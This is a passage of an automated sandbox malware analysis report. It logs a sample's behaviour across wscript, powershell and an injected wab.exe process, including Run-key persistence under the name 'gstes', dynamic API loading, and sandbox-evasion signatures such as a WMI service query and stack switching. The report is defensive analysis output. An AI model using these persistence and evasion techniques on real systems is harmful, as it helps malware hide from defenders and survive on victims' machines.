              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F652D2 push cs; ret 5_2_08F65301
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F62AAA push 00000009h; iretd 5_2_08F62AB7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F62291 push edx; retf 5_2_08F6229A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F63E85 push ebp; ret 5_2_08F63EC9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F60364 pushfd ; retf 5_2_08F60374
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B31219 push esp; iretd 10_2_22B3121A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22B22806 push ecx; ret 10_2_22B22819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A80364 pushfd ; retf 10_2_03A80374
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A82AAA push 00000009h; iretd 10_2_03A82AB7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A83E85 push ebp; ret 10_2_03A83EC9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A82291 push edx; retf 10_2_03A8229A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A852D2 push cs; ret 10_2_03A85301
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A84D9F push ss; ret 10_2_03A84DAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A83118 push eax; iretd 10_2_03A8311A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A83571 push esp; ret 10_2_03A8358B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A848A4 push ebx; ret 10_2_03A848A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A82845 push cs; iretd 10_2_03A8284F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044693D push ecx; ret 19_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044DB70 push eax; ret 19_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044DB70 push eax; ret 19_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00451D54 push eax; ret 19_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044B090 push eax; ret 21_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_0044B090 push eax; ret 21_2_0044B0CC
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstesJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 21_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_004047CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Switches to a custom stack to bypass stack traces
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 45859B3
